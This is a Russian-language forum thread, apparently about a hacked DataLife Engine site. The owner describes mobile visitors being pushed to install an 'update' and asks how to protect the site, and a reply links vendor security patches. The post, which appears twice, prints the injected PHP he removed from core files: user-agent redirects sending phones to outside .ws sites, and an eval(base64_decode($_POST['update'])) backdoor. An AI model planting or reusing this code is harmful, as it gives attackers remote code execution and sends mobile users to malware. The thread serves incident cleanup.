Перейти к публикации

Как защититься от подобного.


Рекомендованные сообщения

Здравствуйте уважаемые гуру. У меня возникла такая ситуация, есть сайт petrukiv.te.ua, проблем не было два года. Но после нового года никак не мог зайти на сайт со смартфона, он постоянно требовал какой-то апдейт , но поскольку я когда-то один раз сделал и дорого поплатился, впредь я этого не делал. Но сегодня я попросил своего друга зайти на сайт со своего телефона и та самая фигня. Модулей сторонних нету. Если кто знает как это могло произойти, прошу помощи. В dbconfig, engine, init php удалил следующее:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: statuses.ws);

}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: getinternet.ws);

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));$category_skin = "";

if ($category != '') $category_id = get_ID ( $cat_info, $category );

else $category_id = false;

if ($category_id) $category_skin = $cat_info[$category_id]['skin'];

Отчего случилось и как защитится? Заранее спасибо!!!

Здравствуйте уважаемые гуру. У меня возникла такая ситуация, есть сайт petrukiv.te.ua, проблем не было два года. Но после нового года никак не мог зайти на сайт со смартфона, он постоянно требовал какой-то апдейт , но поскольку я когда-то один раз сделал и дорого поплатился, впредь я этого не делал. Но сегодня я попросил своего друга зайти на сайт со своего телефона и та самая фигня. Модулей сторонних нету. Если кто знает как это могло произойти, прошу помощи. В dbconfig, engine, init php удалил следующее:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: statuses.ws);

}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: getinternet.ws);

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));$category_skin = "";

if ($category != '') $category_id = get_ID ( $cat_info, $category );

else $category_id = false;

if ($category_id) $category_skin = $cat_info[$category_id]['skin'];

Отчего случилось и как защитится? Заранее спасибо!!!

Простите за дубликат, уже нашел ответ, но для 9.7, а как быть с 9.2?

Изменено пользователем lukasteam
Ссылка на сообщение
Поделиться на других сайтах

Простите за дубликат, уже нашел ответ, но для 9.7, а как быть с 9.2?

Ставить другие патчи безопасности http://dle-news.ru/bags/ которые подходят для вашей версии, в частности:

http://dle-news.ru/bags/v96/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

http://dle-news.ru/bags/v96/1538-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

http://dle-news.ru/bags/v96/1525-nedostatochnaya-kriptograficheskaya-ustoychivost.html

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...